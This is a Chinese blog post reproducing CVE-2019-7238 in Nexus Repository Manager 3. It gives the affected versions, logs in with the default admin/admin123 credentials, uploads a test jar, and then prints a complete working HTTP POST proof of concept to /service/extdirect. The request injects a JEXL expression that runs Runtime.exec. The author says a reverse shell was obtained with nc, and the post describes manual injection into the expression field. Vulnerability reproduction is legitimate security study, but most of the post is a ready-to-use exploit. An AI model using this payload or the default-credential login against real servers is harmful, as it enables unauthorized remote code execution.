Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞复现

漏洞背景

Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3中由于存在访问控制措施的不足,未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的。

影响范围

Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本

复现条件

  1. 未授权的访问
  2. 弱口令访问
  3. jar包上传

漏洞利用

nexus默认端口为8081,且存在未授权访问(3.15起关闭此功能),通过弱口令admin/admin123进入
在这里插入图片描述
需要上传jar包
但大佬说“真实环境则不需要,因为真实环境已经上传了assert
自己制作一个jar包

》》cat T1.java
》》public class T1 {
	public static void main(String[] args) {
	System.out.println("hello world");
	}
	}
》》javac T1.java
》》jar cvf T1.jar T1.class

在这里插入图片描述
在这里插入图片描述
上传之后便可以用PoC了

POST /service/extdirect HTTP/1.1
Host: IP:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Content-Type: application/json
Content-Length: 308
Connection: close

{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":25,"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":4}

将PoC放入Burpsuite,更改下IP,我这边直接用的nc反弹shell
在这里插入图片描述
在这里插入图片描述
当然也可以手工利用
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

将选项改为All Repositorles后点击Prevlew抓包

在这里插入图片描述

expressiontype的value处进行注入,即可达到与PoC同样的效果。

在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值